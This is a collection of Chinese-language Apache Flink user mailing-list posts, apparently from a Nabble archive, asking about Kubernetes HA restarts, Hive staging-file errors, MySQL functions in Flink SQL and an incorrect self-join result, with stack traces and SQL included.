大约几十分钟就会restart,请教大佬们有查的思路,每次抛出的错误都是一样的,运行一段时间也会积累很多ConfigMap,下面是一个具体的错误 错误内容 2021-01-17 04:16:46,116 ERROR org.apache.flink.runtime.resourcemanager.StandaloneResourceManager [] - Fatal error occurred in ResourceManager. org.apache.flink.runtime.leaderretrieval.LeaderRetrievalException: Error while watching the ConfigMap test-flink-etl-42557c3f6325ffc876958430859178cd-jobmanager-leader at org.apache.flink.kubernetes.highavailability.KubernetesLeaderRetrievalDriver$ConfigMapCallbackHandlerImpl.handleFatalError(KubernetesLeaderRetrievalDriver.java:120) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.kubeclient.resources.AbstractKubernetesWatcher.onClose(AbstractKubernetesWatcher.java:48) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.utils.WatcherToggle.onClose(WatcherToggle.java:56) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager.closeEvent(WatchConnectionManager.java:367) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager.access$700(WatchConnectionManager.java:50) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager$1.onMessage(WatchConnectionManager.java:259) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket.onReadMessage(RealWebSocket.java:323) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.WebSocketReader.readMessageFrame(WebSocketReader.java:219) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.WebSocketReader.processNextFrame(WebSocketReader.java:105) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket.loopReader(RealWebSocket.java:274) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket$2.onResponse(RealWebSocket.java:214) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.RealCall$AsyncCall.execute(RealCall.java:206) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.NamedRunnable.run(NamedRunnable.java:32) [flink-dist_2.11-1.12.1.jar:1.12.1] at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149) [?:1.8.0_275] at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624) [?:1.8.0_275] at java.lang.Thread.run(Thread.java:748) [?:1.8.0_275] 2021-01-17 04:16:46,117 ERROR org.apache.flink.runtime.entrypoint.ClusterEntrypoint[] - Fatal error occurred in the cluster entrypoint. org.apache.flink.runtime.leaderretrieval.LeaderRetrievalException: Error while watching the ConfigMap test-flink-etl-42557c3f6325ffc876958430859178cd-jobmanager-leader at org.apache.flink.kubernetes.highavailability.KubernetesLeaderRetrievalDriver$ConfigMapCallbackHandlerImpl.handleFatalError(KubernetesLeaderRetrievalDriver.java:120) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.kubeclient.resources.AbstractKubernetesWatcher.onClose(AbstractKubernetesWatcher.java:48) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.utils.WatcherToggle.onClose(WatcherToggle.java:56) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager.closeEvent(WatchConnectionManager.java:367) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager.access$700(WatchConnectionManager.java:50) [flink-dist_2.11-1.12.1.jar:1.12.1] at io.fabric8.kubernetes.client.dsl.internal.WatchConnectionManager$1.onMessage(WatchConnectionManager.java:259) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket.onReadMessage(RealWebSocket.java:323) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.WebSocketReader.readMessageFrame(WebSocketReader.java:219) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.WebSocketReader.processNextFrame(WebSocketReader.java:105) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket.loopReader(RealWebSocket.java:274) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.ws.RealWebSocket$2.onResponse(RealWebSocket.java:214) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.RealCall$AsyncCall.execute(RealCall.java:206) [flink-dist_2.11-1.12.1.jar:1.12.1] at org.apache.flink.kubernetes.shaded.okhttp3.internal.NamedRunnable.run(NamedRunnable.java:32) [fl
flink 1.12 插入 hive 表找不到 .staging_xxxx 文件
flink 1.12 standalone cluster,定时batch 模式 insert overwrite 到 hive 表,会随机出现找不到 .staging_ 文件的错误,完整错误信息如下:org.apache.flink.runtime.JobException: Recovery is suppressed by NoRestartBackoffTimeStrategy at org.apache.flink.runtime.executiongraph.failover.flip1.ExecutionFailureHandler.handleFailure(ExecutionFailureHandler.java:116) at org.apache.flink.runtime.executiongraph.failover.flip1.ExecutionFailureHandler.getGlobalFailureHandlingResult(ExecutionFailureHandler.java:89) at org.apache.flink.runtime.scheduler.DefaultScheduler.handleGlobalFailure(DefaultScheduler.java:240) at org.apache.flink.runtime.scheduler.UpdateSchedulerNgOnInternalFailuresListener.notifyGlobalFailure(UpdateSchedulerNgOnInternalFailuresListener.java:65) at org.apache.flink.runtime.executiongraph.ExecutionGraph.failGlobal(ExecutionGraph.java:1055) at org.apache.flink.runtime.executiongraph.ExecutionGraph.vertexFinished(ExecutionGraph.java:1305) at org.apache.flink.runtime.executiongraph.ExecutionVertex.executionFinished(ExecutionVertex.java:849) at org.apache.flink.runtime.executiongraph.Execution.markFinished(Execution.java:1127) at org.apache.flink.runtime.executiongraph.ExecutionGraph.updateStateInternal(ExecutionGraph.java:1512) at org.apache.flink.runtime.executiongraph.ExecutionGraph.updateState(ExecutionGraph.java:1485) at org.apache.flink.runtime.scheduler.SchedulerBase.updateTaskExecutionState(SchedulerBase.java:604) at org.apache.flink.runtime.scheduler.SchedulerNG.updateTaskExecutionState(SchedulerNG.java:89) at org.apache.flink.runtime.jobmaster.JobMaster.updateTaskExecutionState(JobMaster.java:419) at sun.reflect.GeneratedMethodAccessor56.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.handleRpcInvocation(AkkaRpcActor.java:286) at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.handleRpcMessage(AkkaRpcActor.java:201) at org.apache.flink.runtime.rpc.akka.FencedAkkaRpcActor.handleRpcMessage(FencedAkkaRpcActor.java:74) at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.handleMessage(AkkaRpcActor.java:154) at akka.japi.pf.UnitCaseStatement.apply(CaseStatements.scala:26)at akka.japi.pf.UnitCaseStatement.apply(CaseStatements.scala:21) at scala.PartialFunction$class.applyOrElse(PartialFunction.scala:123) at akka.japi.pf.UnitCaseStatement.applyOrElse(CaseStatements.scala:21) at scala.PartialFunction$OrElse.applyOrElse(PartialFunction.scala:170) at scala.PartialFunction$OrElse.applyOrElse(PartialFunction.scala:171) at scala.PartialFunction$OrElse.applyOrElse(PartialFunction.scala:171) at akka.actor.Actor$class.aroundReceive(Actor.scala:517) at akka.actor.AbstractActor.aroundReceive(AbstractActor.scala:225) at akka.actor.ActorCell.receiveMessage(ActorCell.scala:592)at akka.actor.ActorCell.invoke(ActorCell.scala:561)at akka.dispatch.Mailbox.processMailbox(Mailbox.scala:258) at akka.dispatch.Mailbox.run(Mailbox.scala:225)at akka.dispatch.Mailbox.exec(Mailbox.scala:235) at akka.dispatch.forkjoin.ForkJoinTask.doExec(ForkJoinTask.java:260) at akka.dispatch.forkjoin.ForkJoinPool$WorkQueue.runTask(ForkJoinPool.java:1339) at akka.dispatch.forkjoin.ForkJoinPool.runWorker(ForkJoinPool.java:1979) at akka.dispatch.forkjoin.ForkJoinWorkerThread.run(ForkJoinWorkerThread.java:107)Caused by: java.lang.Exception: Failed to finalize execution on master ... 33 moreCaused by: org.apache.flink.table.api.TableException: Exception in finalizeGlobal at org.apache.flink.table.filesystem.FileSystemOutputFormat.finalizeGlobal(FileSystemOutputFormat.java:97) at org.apache.flink.runtime.jobgraph.InputOutputFormatVertex.finalizeOnMaster(InputOutputFormatVertex.java:131) at org.apache.flink.runtime.executiongraph.ExecutionGraph.vertexFinished(ExecutionGraph.java:1299) ... 32 moreCaused by: java.io.FileNotFoundException: File hdfs://service1/user/hive/warehouse/snmpprobe.db/p_port_packet_loss_5m/.staging_1609040810292 does not exist. at org.apache.hadoop.hdfs.DistributedFileSystem.listStatusInternal(DistributedFileSystem.java:901) at org.apache.hadoop.hdfs.DistributedFileSystem.access$600(DistributedFileSystem.java:112) at org.apache.hadoop.hdfs.DistributedFileSystem$22.doCall(DistributedFileSystem.java:961) at org.apache.hadoop.hdfs.DistributedFileSystem$22.doCall(DistributedFileSystem.java:958) at org.apache.hadoop.fs.FileSystemLinkResolver.resolve(FileSystemLinkResolver.java:81) at org.apache.hadoop.hdfs.DistributedFileSystem.listStatus(DistributedFileSystem.java:958) at org.apache.flink.hive.shaded.fs.hdfs.HadoopFileSystem.listStatus(HadoopFileSystem.java:165) at org.apache.flink.table.filesystem.PartitionTempFileManager.headCheckpoints(PartitionTempFileManager.java:140) at org.apache.flink.table.filesystem.FileSystemCommitter.commitUpToCheckpoint(FileSystemCommitter.java:98) at org.apache.flink.table.filesystem.FileSystemOutpu
flink sql 中是否可以使用 mysql 的存储过程和函数?
需求是这样,mysql中使用 binary(16) 存储 uuid,读取到 flink中需要转换成文本串的uuid,sql是这样 select bin_to_uuid(id, true) as text_uuid from usertable 我尝试使用,报错说 bin_to_uuid 找不到 -- Sent from: http://apache-flink.147419.n8.nabble.com/
Re: 用flink 1.11.2 查询hive表自关联(self inner join) 结果不正确
自己回答一下,供其他人参考。 换成flink 1.12.0-rc1,用相同sql处理相同数据,结果跟 hive 计算的结果相同,确认是 1.11.2 的一个bug,1.12应该已经改正了 -- Sent from: http://apache-flink.147419.n8.nabble.com/
flink 1.11.2 SQL Client self inner join 结果不正确
我用相同的一个表自己 inner join 自己,取不同时间点,得到相同值 sql是这样,p5m 和 p0m 都是 snmpprobe.p_snmp_ifxtable 表,时间不同 select p0m.coltime, p0m.ifhcinoctets a, p0m.ifhcoutoctets c, p5m.coltime, p5m.ifhcinoctets b, p5m.ifhcoutoctets d from snmpprobe.p_snmp_ifxtable as p0m inner join snmpprobe.p_snmp_ifxtable as p5m on p0m.id=p5m.id and p0m.mibindex=p5m.mibindex where p5m.dt='2020-11-23' and p5m.hh='01' and p5m.mi='00' and p5m.mibindex=4 and p5m.ip='172.31.28.4' and p0m.dt='2020-11-23' and p0m.hh='00' and p0m.mi='55'; 用flink sql client执行,计算结果是 coltime,a,c,coltime0, b,d 2020-11-23T01:00 ,3702300836,5541513669,2020-11-23T01:00,3702300836,5541513669 这里 coltime= coltime0,都是2020-11-23T01:00, 同时 a=b,c=d hive 行命令查询结果是 2020-11-23 00:55:00.0,3702187169,5541332531,2020-11-23 01:00:00.0,3702300836,5541513669 coltime=2020-11-23 00:55:00.0 , coltime0=2020-11-23 01:00:00.0,a!=c, b!=d flink 结果明显不正确,flink sql 的self join 需要什么特殊写法吗? -- Sent from: http://apache-flink.147419.n8.nabble.com/
用flink 1.11.2 查询hive表自关联(self inner join) 结果不正确
我用相同的一个表自己 inner join 自己,取不同时间点,得到相同值 sql是这样,p5m 和 p0m 都是 snmpprobe.p_snmp_ifxtable 表,时间不同 select p0m.coltime, p0m.ifhcinoctets a, p0m.ifhcoutoctets c, p5m.coltime, p5m.ifhcinoctets b, p5m.ifhcoutoctets d from snmpprobe.p_snmp_ifxtable as p0m inner join snmpprobe.p_snmp_ifxtable as p5m on p0m.id=p5m.id and p0m.mibindex=p5m.mibindex where p5m.dt='2020-11-23' and p5m.hh='01' and p5m.mi='00' and p5m.mibindex=4 and p5m.ip='172.31.28.4' and p0m.dt='2020-11-23' and p0m.hh='00' and p0m.mi='55'; 用flink sql client执行,计算结果是 coltime,a,c,coltime0, b,d 2020-11-23T01:00 ,3702300836,5541513669,2020-11-23T01:00,3702300836,5541513669 这里 coltime= coltime0,都是2020-11-23T01:00, 同时 a=b,c=d hive 行命令查询结果是 2020-11-23 00:55:00.0,3702187169,5541332531,2020-11-23 01:00:00.0,3702300836,5541513669 coltime=2020-11-23 00:55:00.0 , coltime0=2020-11-23 01:00:00.0,a!=c, b!=d flink 结果明显不正确,flink sql 的self join 需要什么特殊写法吗? -- Sent from: http://apache-flink.147419.n8.nabble.com/